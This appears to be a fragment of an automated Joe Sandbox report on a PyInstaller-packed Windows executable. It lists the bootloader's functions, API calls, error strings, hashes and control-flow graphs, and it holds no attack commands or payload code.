                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                • Opcode ID: 40a9b20beaae105b05f307762b08cca349445b962233dc6f01cf536aed30f25f
                                                                                                                                                                                                                                • Instruction ID: d18ec27516c9eba71bdf2bafad10729bccff6497e1fd522ab5143b55901836cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40a9b20beaae105b05f307762b08cca349445b962233dc6f01cf536aed30f25f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9518B71B0A647D2EE10BF21D4405B9A3A0BF84794F4845F3EE4C877A6DE3DE64AA700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF6AAE23CBB), ref: 00007FF6AAE28704
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6AAE23CBB), ref: 00007FF6AAE2870A
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6AAE23CBB), ref: 00007FF6AAE2874C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28830: GetEnvironmentVariableW.KERNEL32(00007FF6AAE2388E), ref: 00007FF6AAE28867
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6AAE28889
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE38238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE38251
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22810: MessageBoxW.USER32 ref: 00007FF6AAE228EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                • Instruction ID: a1cdc4ca547692adda15fb381e1dda74d3777fe8d9a2f69bb5b349fecd96c71d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68417F31A1B683C5FE14BB25A8552B95294BF887C0F8451B3ED4DC77EADE3CE50BA240

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 756 7ff6aae21210-7ff6aae2126d call 7ff6aae2bd80 759 7ff6aae21297-7ff6aae212af call 7ff6aae34f44 756->759 760 7ff6aae2126f-7ff6aae21296 call 7ff6aae22710 756->760 765 7ff6aae212b1-7ff6aae212cf call 7ff6aae34f08 call 7ff6aae22910 759->765 766 7ff6aae212d4-7ff6aae212e4 call 7ff6aae34f44 759->766 777 7ff6aae21439-7ff6aae2143e call 7ff6aae2ba60 765->777 772 7ff6aae212e6-7ff6aae21304 call 7ff6aae34f08 call 7ff6aae22910 766->772 773 7ff6aae21309-7ff6aae2131b 766->773 772->777 776 7ff6aae21320-7ff6aae21345 call 7ff6aae3039c 773->776 785 7ff6aae2134b-7ff6aae21355 call 7ff6aae30110 776->785 786 7ff6aae21431 776->786 784 7ff6aae21443-7ff6aae2146d call 7ff6aae34f30 * 2 777->784 785->786 792 7ff6aae2135b-7ff6aae21367 785->792 786->777 794 7ff6aae21370-7ff6aae21398 call 7ff6aae2a1c0 792->794 797 7ff6aae21416-7ff6aae2142c call 7ff6aae22710 794->797 798 7ff6aae2139a-7ff6aae2139d 794->798 797->786 799 7ff6aae2139f-7ff6aae213a9 798->799 800 7ff6aae21411 798->800 802 7ff6aae213ab-7ff6aae213b9 call 7ff6aae30adc 799->802 803 7ff6aae213d4-7ff6aae213d7 799->803 800->797 809 7ff6aae213be-7ff6aae213c1 802->809 804 7ff6aae213d9-7ff6aae213e7 call 7ff6aae49e30 803->804 805 7ff6aae213ea-7ff6aae213ef 803->805 804->805 805->794 808 7ff6aae213f5-7ff6aae213f8 805->808 811 7ff6aae213fa-7ff6aae213fd 808->811 812 7ff6aae2140c-7ff6aae2140f 808->812 813 7ff6aae213cf-7ff6aae213d2 809->813 814 7ff6aae213c3-7ff6aae213cd call 7ff6aae30110 809->814 811->797 815 7ff6aae213ff-7ff6aae21407 811->815 812->786 813->797 814->805 814->813 815->776
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                • Opcode ID: 0e7f4c1e83c763c73bdf253078e4cd0e6274f61eb17ee5b4db47df08ee179fc2
                                                                                                                                                                                                                                • Instruction ID: 54c2288ff393d4a3b87b37caae2bb191664513216d900af6aee44a866fee743d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e7f4c1e83c763c73bdf253078e4cd0e6274f61eb17ee5b4db47df08ee179fc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F51B032A0A643C6EA60BF11E4403BA6291BF84794F4841B6ED4DC77D5EE3CE60BE700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6AAE23804), ref: 00007FF6AAE236E1
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE23804), ref: 00007FF6AAE236EB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22C9E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22D63
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: MessageBoxW.USER32 ref: 00007FF6AAE22D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction ID: d1051705bbeb350af035d1e2ddb3381b3951559b383e82543ce2d4e0151c79ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D214F71B1A643C1FE21BF24E8153B62254BF88394F8042F7E65DC66D5EE2DE50AE740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1001 7ff6aae3ba5c-7ff6aae3ba82 1002 7ff6aae3ba9d-7ff6aae3baa1 1001->1002 1003 7ff6aae3ba84-7ff6aae3ba98 call 7ff6aae34ee8 call 7ff6aae34f08 1001->1003 1005 7ff6aae3be77-7ff6aae3be83 call 7ff6aae34ee8 call 7ff6aae34f08 1002->1005 1006 7ff6aae3baa7-7ff6aae3baae 1002->1006 1017 7ff6aae3be8e 1003->1017 1025 7ff6aae3be89 call 7ff6aae3a8e0 1005->1025 1006->1005 1008 7ff6aae3bab4-7ff6aae3bae2 1006->1008 1008->1005 1011 7ff6aae3bae8-7ff6aae3baef 1008->1011 1014 7ff6aae3bb08-7ff6aae3bb0b 1011->1014 1015 7ff6aae3baf1-7ff6aae3bb03 call 7ff6aae34ee8 call 7ff6aae34f08 1011->1015 1020 7ff6aae3bb11-7ff6aae3bb17 1014->1020 1021 7ff6aae3be73-7ff6aae3be75 1014->1021 1015->1025 1023 7ff6aae3be91-7ff6aae3bea8 1017->1023 1020->1021 1022 7ff6aae3bb1d-7ff6aae3bb20 1020->1022 1021->1023 1022->1015 1026 7ff6aae3bb22-7ff6aae3bb47 1022->1026 1025->1017 1029 7ff6aae3bb49-7ff6aae3bb4b 1026->1029 1030 7ff6aae3bb7a-7ff6aae3bb81 1026->1030 1032 7ff6aae3bb4d-7ff6aae3bb54 1029->1032 1033 7ff6aae3bb72-7ff6aae3bb78 1029->1033 1034 7ff6aae3bb56-7ff6aae3bb6d call 7ff6aae34ee8 call 7ff6aae34f08 call 7ff6aae3a8e0 1030->1034 1035 7ff6aae3bb83-7ff6aae3bbab call 7ff6aae3d5fc call 7ff6aae3a948 * 2 1030->1035 1032->1033 1032->1034 1037 7ff6aae3bbf8-7ff6aae3bc0f 1033->1037 1066 7ff6aae3bd00 1034->1066 1062 7ff6aae3bbc8-7ff6aae3bbf3 call 7ff6aae3c284 1035->1062 1063 7ff6aae3bbad-7ff6aae3bbc3 call 7ff6aae34f08 call 7ff6aae34ee8 1035->1063 1040 7ff6aae3bc8a-7ff6aae3bc94 call 7ff6aae4391c 1037->1040 1041 7ff6aae3bc11-7ff6aae3bc19 1037->1041 1054 7ff6aae3bc9a-7ff6aae3bcaf 1040->1054 1055 7ff6aae3bd1e 1040->1055 1041->1040 1046 7ff6aae3bc1b-7ff6aae3bc1d 1041->1046 1046->1040 1050 7ff6aae3bc1f-7ff6aae3bc35 1046->1050 1050->1040 1051 7ff6aae3bc37-7ff6aae3bc43 1050->1051 1051->1040 1056 7ff6aae3bc45-7ff6aae3bc47 1051->1056 1054->1055 1060 7ff6aae3bcb1-7ff6aae3bcc3 GetConsoleMode 1054->1060 1058 7ff6aae3bd23-7ff6aae3bd43 ReadFile 1055->1058 1056->1040 1061 7ff6aae3bc49-7ff6aae3bc61 1056->1061 1064 7ff6aae3bd49-7ff6aae3bd51 1058->1064 1065 7ff6aae3be3d-7ff6aae3be46 GetLastError 1058->1065 1060->1055 1067 7ff6aae3bcc5-7ff6aae3bccd 1060->1067 1061->1040 1069 7ff6aae3bc63-7ff6aae3bc6f 1061->1069 1062->1037 1063->1066 1064->1065 1071 7ff6aae3bd57 1064->1071 1074 7ff6aae3be48-7ff6aae3be5e call 7ff6aae34f08 call 7ff6aae34ee8 1065->1074 1075 7ff6aae3be63-7ff6aae3be66 1065->1075 1068 7ff6aae3bd03-7ff6aae3bd0d call 7ff6aae3a948 1066->1068 1067->1058 1073 7ff6aae3bccf-7ff6aae3bcf1 ReadConsoleW 1067->1073 1068->1023 1069->1040 1078 7ff6aae3bc71-7ff6aae3bc73 1069->1078 1082 7ff6aae3bd5e-7ff6aae3bd73 1071->1082 1084 7ff6aae3bcf3 GetLastError 1073->1084 1085 7ff6aae3bd12-7ff6aae3bd1c 1073->1085 1074->1066 1079 7ff6aae3bcf9-7ff6aae3bcfb call 7ff6aae34e7c 1075->1079 1080 7ff6aae3be6c-7ff6aae3be6e 1075->1080 1078->1040 1088 7ff6aae3bc75-7ff6aae3bc85 1078->1088 1079->1066 1080->1068 1082->1068 1090 7ff6aae3bd75-7ff6aae3bd80 1082->1090 1084->1079 1085->1082 1088->1040 1094 7ff6aae3bda7-7ff6aae3bdaf 1090->1094 1095 7ff6aae3bd82-7ff6aae3bd9b call 7ff6aae3b674 1090->1095 1098 7ff6aae3be2b-7ff6aae3be38 call 7ff6aae3b4b4 1094->1098 1099 7ff6aae3bdb1-7ff6aae3bdc3 1094->1099 1103 7ff6aae3bda0-7ff6aae3bda2 1095->1103 1098->1103 1100 7ff6aae3be1e-7ff6aae3be26 1099->1100 1101 7ff6aae3bdc5 1099->1101 1100->1068 1104 7ff6aae3bdca-7ff6aae3bdd1 1101->1104 1103->1068 1106 7ff6aae3be0d-7ff6aae3be18 1104->1106 1107 7ff6aae3bdd3-7ff6aae3bdd7 1104->1107 1106->1100 1108 7ff6aae3bdd9-7ff6aae3bde0 1107->1108 1109 7ff6aae3bdf3 1107->1109 1108->1109 1110 7ff6aae3bde2-7ff6aae3bde6 1108->1110 1111 7ff6aae3bdf9-7ff6aae3be09 1109->1111 1110->1109 1112 7ff6aae3bde8-7ff6aae3bdf1 1110->1112 1111->1104 1113 7ff6aae3be0b 1111->1113 1112->1111 1113->1100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                • Instruction ID: 2e882a6d3a00fc7339fb4ba1f3d9765ebbd13e54dbe0dff70d2b6d79d5a33f38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AC1E53290E686C1E660AB1594402BDBB94FF81B80F5541B3EACF877A1CF7DE446A720

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                • Instruction ID: 176501d5a97e424bb2dffd502ea3324bc086f454988b32903e9c4c8bcc09f73b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE217331A0D683C2EB10AF55F45023AA7A4FFC17A0F5402B6EA6D83BE4DE7DD44A9700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetCurrentProcess.KERNEL32 ref: 00007FF6AAE28590
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: OpenProcessToken.ADVAPI32 ref: 00007FF6AAE285A3
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetTokenInformation.KERNELBASE ref: 00007FF6AAE285C8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetLastError.KERNEL32 ref: 00007FF6AAE285D2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: GetTokenInformation.KERNELBASE ref: 00007FF6AAE28612
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6AAE2862E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE28570: CloseHandle.KERNEL32 ref: 00007FF6AAE28646
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6AAE23C55), ref: 00007FF6AAE2916C
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6AAE23C55), ref: 00007FF6AAE29175
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                • Instruction ID: dc218a96754216bd24b27328b22c9433c27dde01107a4f0b4aae4a20b8bf5513
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63212F31A0A742C2FA10BF21E4153EA6265FF84780F4550B7EA4DD3796DF3DD94AA780
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6AAE2352C,?,00000000,00007FF6AAE23F1B), ref: 00007FF6AAE27F32
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                • Instruction ID: c775eb3d622c357eaf392b62094f2fed4e9c3d2ba5d0f7fb917003ef6079aca3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D831A77171AAC6C5FE21AF21E4507AA6354FF84BE0F4402B2EE6D877C5DE2CD64A9700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE3CF4B), ref: 00007FF6AAE3D07C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE3CF4B), ref: 00007FF6AAE3D107
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction ID: dd95220f770cefda4994ded89852bbb80f4bb39a0434ba6b8038c97bee6156e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C491E632F19651CAF750AF6594802BDABA0BB40B88F1445B7DE8ED36A4DF38D447E720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
